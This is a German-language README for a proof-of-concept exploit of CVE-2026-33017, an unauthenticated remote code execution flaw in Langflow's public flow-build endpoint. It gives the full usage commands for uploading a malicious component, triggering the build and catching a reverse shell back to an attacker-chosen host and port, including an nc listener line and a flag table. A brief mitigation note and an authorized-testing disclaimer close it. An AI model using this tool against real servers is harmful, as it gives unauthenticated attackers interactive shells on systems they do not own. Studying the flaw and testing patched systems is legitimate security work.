
CVE-2026-33017 Langflow RCE PoC
PoC für die unauthentifizierte Codeausführungsschwachstelle build_public_tmp in Langflow.
Er lädt eine bösartige Komponente in einen öffentlichen Flow hoch, löst einen Build aus und fängt eine Reverse Shell.
Nur für autorisierte Sicherheitstests. Verwende ihn nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.
requests (pip install requests)Starte den integrierten Listener und löse den Exploit in einem Rutsch aus:
python3 poc.py \
--url https://target:7860 \
--flow-id <public-flow-uuid> \
--lhost <your-ip> \
--lport 4444 \
--listen
Sobald sich die Shell verbindet, wird automatisch versucht, sie zu einer vollständig interaktiven Shell zu erweitern.
Falls du lieber deinen eigenen Listener verwenden möchtest (z. B. nc -lvnp 4444), lass weg:
--listenpython3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444
| Flag | Beschreibung |
|---|---|
--url | Ziel-URL des Langflow-Servers (erforderlich) |
--flow-id | UUID des freigegebenen öffentlichen Flows (erforderlich) |
--lhost | IP-Adresse für den Reverse-Shell-Callback (erforderlich) |
--lport | Port für den Reverse-Shell-Callback (erforderlich) |
--listen | Integrierten Listener ausführen |
--timeout | HTTP-Request-Timeout in Sekunden (Standard: 30) |
-k, --insecure | TLS-Zertifikatsprüfung deaktivieren (selbstsignierte / abgelaufene Zertifikate) |
--no-upgrade | Automatisches TTY-Upgrade überspringen, einfache Zeilen-Shell verwenden |
CVE-2026-33017 ist eine unauthentifizierte RCE im Endpunkt POST /api/v1/build_public_tmp/{flow_id}/flow von Langflow, der von Angreifern bereitgestellten Python-Code aus Flow-Knoten-Definitionen ohne Sandboxing ausführt. Weitere Informationen findest du in den folgenden Ressourcen:
Maßnahmen aus dem Sysdig Threat Research-Bericht:
/api/v1/build_public_tmp oder deaktiviere das öffentliche Erstellen von Flows vollständig.Dieses Tool wird für Forschung und autorisierte Penetrationstests bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.